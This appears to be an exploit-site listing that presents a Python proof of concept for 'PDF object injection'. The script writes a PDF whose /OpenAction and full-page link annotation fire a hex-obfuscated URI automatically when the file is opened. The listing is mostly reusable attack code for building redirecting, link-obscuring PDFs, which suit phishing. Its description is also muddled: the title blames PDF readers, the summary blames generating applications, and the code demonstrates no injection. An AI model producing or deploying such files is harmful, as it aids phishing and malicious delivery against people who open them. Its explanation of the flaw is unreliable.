Share
## https://sploitus.com/exploit?id=PACKETSTORM:216219
=============================================================================================================================================
| # Title : PDF Object Injection Vulnerability โ Impact on PDF Readers |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://get.adobe.com/reader/ |
=============================================================================================================================================
[+] Summary : PDF Object Injection is a vulnerability in applications that dynamically generate PDFs from user input without proper validation or escaping.
An attacker can inject PDF objects (e.g., /OpenAction, /URI, or JavaScript), potentially creating malicious PDFs that perform automatic link redirects, execute scripts, or modify metadata.
This vulnerability exists in the PDF-generating application, not in PDF readers like Adobe Acrobat, Chrome, or Firefox. Proper input sanitization, escaping, and secure PDF libraries prevent this issue
[+] Note : that you do not need external libraries such as jsPDF.
The same exploit works with the jsPDF library.
[+] POC :
import os
def create_raw_obfuscated_pdf(filename, target_url):
hex_url = "".join([f"{ord(c):02x}" for c in target_url])
hex_payload = f"<{hex_url}>"
pdf_content = (
f"%PDF-1.7\n"
f"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n"
f"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
f"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>\nendobj\n"
f"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0] /A 5 0 R >>\nendobj\n"
f"5 0 obj\n<< /S /URI /URI {hex_payload} >>\nendobj\n"
f"xref\n0 6\n0000000000 65535 f\n0000000010 00000 n\n0000000079 00000 n\n"
f"0000000139 00000 n\n0000000220 00000 n\n0000000318 00000 n\ntrailer\n"
f"<< /Size 6 /Root 1 0 R >>\nstartxref\n400\n%%EOF"
)
try:
with open(filename, "wb") as f:
f.write(pdf_content.encode('latin-1'))
print("-" * 50)
print(f" Raw file created (No libraries used): {filename}")
print(f" Obfuscated link inside the file: {hex_payload}")
print("-" * 50)
except Exception as e:
print(f" Write error: {e}")
if __name__ == "__main__":
desktop = os.path.join(os.environ['USERPROFILE'], 'Desktop')
file_path = os.path.join(desktop, "Pure_Raw_Exploit.pdf")
target = "https://packetstorm.news"
create_raw_obfuscated_pdf(file_path, target)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================